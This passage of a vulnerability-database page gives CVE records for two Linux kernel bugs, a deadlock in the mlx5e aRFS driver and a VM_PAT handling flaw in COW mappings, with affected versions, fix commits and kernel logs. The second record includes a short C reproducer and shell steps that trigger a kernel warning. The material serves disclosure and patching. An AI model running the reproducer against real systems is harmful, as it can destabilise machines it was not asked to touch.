	https://git.kernel.org/stable/c/0080bf99499468030…
	https://git.kernel.org/stable/c/fef965764cf562f28…

Impacted products

Vendor

Product

Version

Linux

Affected: 45bf454ae88414e80b80979ebb2c22bd66ea7d1b , < 46efa4d5930cf3c2af8c01f75e0a47e4fc045e3b (git)
Affected: 45bf454ae88414e80b80979ebb2c22bd66ea7d1b , < 48c4bb81df19402d4346032353d0795260255e3b (git)
Affected: 45bf454ae88414e80b80979ebb2c22bd66ea7d1b , < 0080bf99499468030248ebd25dd645e487dcecdc (git)
Affected: 45bf454ae88414e80b80979ebb2c22bd66ea7d1b , < fef965764cf562f28afb997b626fc7c3cec99693 (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27014",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:40:27.350253Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:46:06.728Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:11.645Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/46efa4d5930cf3c2af8c01f75e0a47e4fc045e3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48c4bb81df19402d4346032353d0795260255e3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0080bf99499468030248ebd25dd645e487dcecdc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fef965764cf562f28afb997b626fc7c3cec99693"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "46efa4d5930cf3c2af8c01f75e0a47e4fc045e3b",
              "status": "affected",
              "version": "45bf454ae88414e80b80979ebb2c22bd66ea7d1b",
              "versionType": "git"
            },
            {
              "lessThan": "48c4bb81df19402d4346032353d0795260255e3b",
              "status": "affected",
              "version": "45bf454ae88414e80b80979ebb2c22bd66ea7d1b",
              "versionType": "git"
            },
            {
              "lessThan": "0080bf99499468030248ebd25dd645e487dcecdc",
              "status": "affected",
              "version": "45bf454ae88414e80b80979ebb2c22bd66ea7d1b",
              "versionType": "git"
            },
            {
              "lessThan": "fef965764cf562f28afb997b626fc7c3cec99693",
              "status": "affected",
              "version": "45bf454ae88414e80b80979ebb2c22bd66ea7d1b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Prevent deadlock while disabling aRFS\n\nWhen disabling aRFS under the `priv-\u003estate_lock`, any scheduled\naRFS works are canceled using the `cancel_work_sync` function,\nwhich waits for the work to end if it has already started.\nHowever, while waiting for the work handler, the handler will\ntry to acquire the `state_lock` which is already acquired.\n\nThe worker acquires the lock to delete the rules if the state\nis down, which is not the worker\u0027s responsibility since\ndisabling aRFS deletes the rules.\n\nAdd an aRFS state variable, which indicates whether the aRFS is\nenabled and prevent adding rules when the aRFS is disabled.\n\nKernel log:\n\n======================================================\nWARNING: possible circular locking dependency detected\n6.7.0-rc4_net_next_mlx5_5483eb2 #1 Tainted: G          I\n------------------------------------------------------\nethtool/386089 is trying to acquire lock:\nffff88810f21ce68 ((work_completion)(\u0026rule-\u003earfs_work)){+.+.}-{0:0}, at: __flush_work+0x74/0x4e0\n\nbut task is already holding lock:\nffff8884a1808cc0 (\u0026priv-\u003estate_lock){+.+.}-{3:3}, at: mlx5e_ethtool_set_channels+0x53/0x200 [mlx5_core]\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #1 (\u0026priv-\u003estate_lock){+.+.}-{3:3}:\n       __mutex_lock+0x80/0xc90\n       arfs_handle_work+0x4b/0x3b0 [mlx5_core]\n       process_one_work+0x1dc/0x4a0\n       worker_thread+0x1bf/0x3c0\n       kthread+0xd7/0x100\n       ret_from_fork+0x2d/0x50\n       ret_from_fork_asm+0x11/0x20\n\n-\u003e #0 ((work_completion)(\u0026rule-\u003earfs_work)){+.+.}-{0:0}:\n       __lock_acquire+0x17b4/0x2c80\n       lock_acquire+0xd0/0x2b0\n       __flush_work+0x7a/0x4e0\n       __cancel_work_timer+0x131/0x1c0\n       arfs_del_rules+0x143/0x1e0 [mlx5_core]\n       mlx5e_arfs_disable+0x1b/0x30 [mlx5_core]\n       mlx5e_ethtool_set_channels+0xcb/0x200 [mlx5_core]\n       ethnl_set_channels+0x28f/0x3b0\n       ethnl_default_set_doit+0xec/0x240\n       genl_family_rcv_msg_doit+0xd0/0x120\n       genl_rcv_msg+0x188/0x2c0\n       netlink_rcv_skb+0x54/0x100\n       genl_rcv+0x24/0x40\n       netlink_unicast+0x1a1/0x270\n       netlink_sendmsg+0x214/0x460\n       __sock_sendmsg+0x38/0x60\n       __sys_sendto+0x113/0x170\n       __x64_sys_sendto+0x20/0x30\n       do_syscall_64+0x40/0xe0\n       entry_SYSCALL_64_after_hwframe+0x46/0x4e\n\nother info that might help us debug this:\n\n Possible unsafe locking scenario:\n\n       CPU0                    CPU1\n       ----                    ----\n  lock(\u0026priv-\u003estate_lock);\n                               lock((work_completion)(\u0026rule-\u003earfs_work));\n                               lock(\u0026priv-\u003estate_lock);\n  lock((work_completion)(\u0026rule-\u003earfs_work));\n\n *** DEADLOCK ***\n\n3 locks held by ethtool/386089:\n #0: ffffffff82ea7210 (cb_lock){++++}-{3:3}, at: genl_rcv+0x15/0x40\n #1: ffffffff82e94c88 (rtnl_mutex){+.+.}-{3:3}, at: ethnl_default_set_doit+0xd3/0x240\n #2: ffff8884a1808cc0 (\u0026priv-\u003estate_lock){+.+.}-{3:3}, at: mlx5e_ethtool_set_channels+0x53/0x200 [mlx5_core]\n\nstack backtrace:\nCPU: 15 PID: 386089 Comm: ethtool Tainted: G          I        6.7.0-rc4_net_next_mlx5_5483eb2 #1\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x60/0xa0\n check_noncircular+0x144/0x160\n __lock_acquire+0x17b4/0x2c80\n lock_acquire+0xd0/0x2b0\n ? __flush_work+0x74/0x4e0\n ? save_trace+0x3e/0x360\n ? __flush_work+0x74/0x4e0\n __flush_work+0x7a/0x4e0\n ? __flush_work+0x74/0x4e0\n ? __lock_acquire+0xa78/0x2c80\n ? lock_acquire+0xd0/0x2b0\n ? mark_held_locks+0x49/0x70\n __cancel_work_timer+0x131/0x1c0\n ? mark_held_locks+0x49/0x70\n arfs_del_rules+0x143/0x1e0 [mlx5_core]\n mlx5e_arfs_disable+0x1b/0x30 [mlx5_core]\n mlx5e_ethtool_set_channels+0xcb/0x200 [mlx5_core]\n ethnl_set_channels+0x28f/0x3b0\n ethnl_default_set_doit+0xec/0x240\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x188/0x2c0\n ? ethn\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:11.864Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/46efa4d5930cf3c2af8c01f75e0a47e4fc045e3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/48c4bb81df19402d4346032353d0795260255e3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/0080bf99499468030248ebd25dd645e487dcecdc"
        },
        {
          "url": "https://git.kernel.org/stable/c/fef965764cf562f28afb997b626fc7c3cec99693"
        }
      ],
      "title": "net/mlx5e: Prevent deadlock while disabling aRFS",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27014",
    "datePublished": "2024-05-01T05:29:46.980Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:11.645Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35877 (GCVE-0-2024-35877)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

x86/mm/pat: fix VM_PAT handling in COW mappings

Summary

In the Linux kernel, the following vulnerability has been resolved: x86/mm/pat: fix VM_PAT handling in COW mappings PAT handling won't do the right thing in COW mappings: the first PTE (or, in fact, all PTEs) can be replaced during write faults to point at anon folios. Reliably recovering the correct PFN and cachemode using follow_phys() from PTEs will not work in COW mappings. Using follow_phys(), we might just get the address+protection of the anon folio (which is very wrong), or fail on swap/nonswap entries, failing follow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and track_pfn_copy(), not properly calling free_pfn_range(). In free_pfn_range(), we either wouldn't call memtype_free() or would call it with the wrong range, possibly leaking memory. To fix that, let's update follow_phys() to refuse returning anon folios, and fallback to using the stored PFN inside vma->vm_pgoff for COW mappings if we run into that. We will now properly handle untrack_pfn() with COW mappings, where we don't need the cachemode. We'll have to fail fork()->track_pfn_copy() if the first page was replaced by an anon folio, though: we'd have to store the cachemode in the VMA to make this work, likely growing the VMA size. For now, lets keep it simple and let track_pfn_copy() just fail in that case: it would have failed in the past with swap/nonswap entries already, and it would have done the wrong thing with anon folios. Simple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn(): <--- C reproducer ---> #include <stdio.h> #include <sys/mman.h> #include <unistd.h> #include <liburing.h> int main(void) { struct io_uring_params p = {}; int ring_fd; size_t size; char *map; ring_fd = io_uring_setup(1, &p); if (ring_fd < 0) { perror("io_uring_setup"); return 1; } size = p.sq_off.array + p.sq_entries * sizeof(unsigned); /* Map the submission queue ring MAP_PRIVATE */ map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE, ring_fd, IORING_OFF_SQ_RING); if (map == MAP_FAILED) { perror("mmap"); return 1; } /* We have at least one page. Let's COW it. */ *map = 0; pause(); return 0; } <--- C reproducer ---> On a system with 16 GiB RAM and swap configured: # ./iouring & # memhog 16G # killall iouring [ 301.552930] ------------[ cut here ]------------ [ 301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100 [ 301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g [ 301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1 [ 301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4 [ 301.559569] RIP: 0010:untrack_pfn+0xf4/0x100 [ 301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000 [ 301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282 [ 301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047 [ 301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200 [ 301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000 [ 301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000 [ 301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000 [ 301.564186] FS: 0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000 [ 301.564773] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0 [ 301.565725] PKRU: 55555554 [ 301.565944] Call Trace: [ 301.566148] <TASK> [ 301.566325] ? untrack_pfn+0xf4/0x100 [ 301.566618] ? __warn+0x81/0x130 [ 301.566876] ? untrack_pfn+0xf4/0x100 [ 3 ---truncated---

Severity ?

No CVSS data available.

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f18681daaec9665a1…
	https://git.kernel.org/stable/c/09e6bb53217bf388a…
	https://git.kernel.org/stable/c/c2b2430b48f3c9eac…
	https://git.kernel.org/stable/c/7cfee26d1950250b1…
	https://git.kernel.org/stable/c/97e93367e82752e47…
	https://git.kernel.org/stable/c/51b7841f3fe84606e…
	https://git.kernel.org/stable/c/1341e4b32e1fb1b0a…
	https://git.kernel.org/stable/c/04c35ab3bdae7fefb…

Impacted products

Vendor

Product

Version

Linux

Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < f18681daaec9665a15c5e7e0f591aad5d0ac622b (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 09e6bb53217bf388a0d2fd7fb21e74ab9dffc173 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 7cfee26d1950250b14c5cb0a37b142f3fcc6396a (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 97e93367e82752e475a33839a80b33bdbef1209f (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 51b7841f3fe84606ec0bd8da859d22e05e5419ec (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 04c35ab3bdae7fefbd7c7a7355f29fa03a035221 (git)

Linux

Affected: 2.6.29
Unaffected: 0 , < 2.6.29 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35877",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-16T21:13:41.454834Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:14:37.162Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.797Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/mm/pat/memtype.c",
            "mm/memory.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f18681daaec9665a15c5e7e0f591aad5d0ac622b",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "09e6bb53217bf388a0d2fd7fb21e74ab9dffc173",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "7cfee26d1950250b14c5cb0a37b142f3fcc6396a",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "97e93367e82752e475a33839a80b33bdbef1209f",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "51b7841f3fe84606ec0bd8da859d22e05e5419ec",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "04c35ab3bdae7fefbd7c7a7355f29fa03a035221",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/mm/pat/memtype.c",
            "mm/memory.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.29"
            },
            {
              "lessThan": "2.6.29",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/mm/pat: fix VM_PAT handling in COW mappings\n\nPAT handling won\u0027t do the right thing in COW mappings: the first PTE (or,\nin fact, all PTEs) can be replaced during write faults to point at anon\nfolios.  Reliably recovering the correct PFN and cachemode using\nfollow_phys() from PTEs will not work in COW mappings.\n\nUsing follow_phys(), we might just get the address+protection of the anon\nfolio (which is very wrong), or fail on swap/nonswap entries, failing\nfollow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and\ntrack_pfn_copy(), not properly calling free_pfn_range().\n\nIn free_pfn_range(), we either wouldn\u0027t call memtype_free() or would call\nit with the wrong range, possibly leaking memory.\n\nTo fix that, let\u0027s update follow_phys() to refuse returning anon folios,\nand fallback to using the stored PFN inside vma-\u003evm_pgoff for COW mappings\nif we run into that.\n\nWe will now properly handle untrack_pfn() with COW mappings, where we\ndon\u0027t need the cachemode.  We\u0027ll have to fail fork()-\u003etrack_pfn_copy() if\nthe first page was replaced by an anon folio, though: we\u0027d have to store\nthe cachemode in the VMA to make this work, likely growing the VMA size.\n\nFor now, lets keep it simple and let track_pfn_copy() just fail in that\ncase: it would have failed in the past with swap/nonswap entries already,\nand it would have done the wrong thing with anon folios.\n\nSimple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn():\n\n\u003c--- C reproducer ---\u003e\n #include \u003cstdio.h\u003e\n #include \u003csys/mman.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cliburing.h\u003e\n\n int main(void)\n {\n         struct io_uring_params p = {};\n         int ring_fd;\n         size_t size;\n         char *map;\n\n         ring_fd = io_uring_setup(1, \u0026p);\n         if (ring_fd \u003c 0) {\n                 perror(\"io_uring_setup\");\n                 return 1;\n         }\n         size = p.sq_off.array + p.sq_entries * sizeof(unsigned);\n\n         /* Map the submission queue ring MAP_PRIVATE */\n         map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE,\n                    ring_fd, IORING_OFF_SQ_RING);\n         if (map == MAP_FAILED) {\n                 perror(\"mmap\");\n                 return 1;\n         }\n\n         /* We have at least one page. Let\u0027s COW it. */\n         *map = 0;\n         pause();\n         return 0;\n }\n\u003c--- C reproducer ---\u003e\n\nOn a system with 16 GiB RAM and swap configured:\n # ./iouring \u0026\n # memhog 16G\n # killall iouring\n[  301.552930] ------------[ cut here ]------------\n[  301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100\n[  301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g\n[  301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1\n[  301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4\n[  301.559569] RIP: 0010:untrack_pfn+0xf4/0x100\n[  301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000\n[  301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282\n[  301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047\n[  301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200\n[  301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000\n[  301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000\n[  301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000\n[  301.564186] FS:  0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000\n[  301.564773] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0\n[  301.565725] PKRU: 55555554\n[  301.565944] Call Trace:\n[  301.566148]  \u003cTASK\u003e\n[  301.566325]  ? untrack_pfn+0xf4/0x100\n[  301.566618]  ? __warn+0x81/0x130\n[  301.566876]  ? untrack_pfn+0xf4/0x100\n[  3\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:25.990Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
